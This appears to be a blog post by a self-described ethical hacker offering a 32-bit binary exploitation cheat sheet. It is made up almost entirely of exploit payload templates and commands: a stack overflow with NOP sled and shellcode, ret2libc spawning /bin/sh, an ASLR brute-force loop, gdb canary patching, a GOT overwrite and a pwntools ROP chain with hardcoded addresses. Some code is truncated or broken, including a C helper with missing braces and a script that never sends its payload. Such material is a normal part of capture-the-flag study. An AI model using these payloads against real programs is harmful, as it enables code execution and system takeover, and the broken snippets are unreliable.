32-bit Binary Exploitation Cheatshet


# Simple BOF 
# jmp_address - somewhere at the start of NOPS
NOPS + shellcode + A*(EBP_offset-len(shellcode)) + jmp_address

#When you have less buffer add the exploit in env and try t ocall it 
export SHELLCODE=$(python -c 'print "\x90"*200')$(cat shellcode)
#find the size of the stack 
p/d ($ebp-$esp)/4+4
#Update the size 
$(python -c 'print "\x0a\xda\xff\xff"*SIZE')

#DEP/NX Bypass 
Ret2LIC - Buffer + SYSTEM + EXIT + /bin/sh 

# DEP + ASLR Bypass
Ret2LIC - Buffer + SYSTEM + EXIT + /bin/sh  > payload
while true; do ./vuln $(cat payload.txt);done

#Canary Bypass
- Set a break point on the stack right after the canary cookie creation 
- Find the address of stack cookie and note it down.
	- EX: DWORD PTR [esp+0x1c],eax
	-  x/wx $esp+0x1c
- Use RET2LIBC technique to exploit the program, then after the buffer, we will restore the canary cookie.  - Buffer + SYSTEM + EXIT + /bin/sh 
- Right before the cookie value is validated we pause the session and update the cookie value
- #Get the stack cookie - canary 
		gdb-peda$ x/wx $esp+0x1c
		0xbffff05c:	0xf6f56000
>  set {int}0xbffff05c=0xf6f56000

# CANARY + RELRO Bypass 
#find a function that needs to be called from GOT and send both the addresses one after another 
other_function sytem_address
$(python -c 'print "\x0c\xa0\x04\x08"') $(python -c 'print "\x10\x13\xe5\xb7"') 

# ROP Chaining 
# call printf function first then run your shell 
# for single jump use popret
# for double jump use pop2ret
payload = buffer + printf_addr + pop_ret + arg_addr + system_addr + exit_addr + binsh_addr
NX with ASLR is enabled - RET2PUTS/RET2System

payload = ""
payload += "A"*140             #junk buffer
payload += p32(system)         #EIP overwrite
payload += p32(exit)           #return address
payload += p32(binsh)          # Argument to system
ROP Exploit

from pwn import *

buffer = b"A" * 140

printf_addr = p32(0xb7e31520)
pop_ret = p32(0x80482c9)
print1_addr = p32(0x8048510)

system_addr = p32(0xb7e1d3d0)
exit_addr = p32(0xb7e105a0)
binsh_addr = p32(0xb7f5e1db)

#payload = buffer + system_addr + exit_addr + binsh_addr

payload = buffer + printf_addr + pop_ret + print1_addr + system_addr + exit_addr + binsh_addr

# Launch the vulnerable program and feed it the payload
p = process('./v1')
GET ENV Address

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment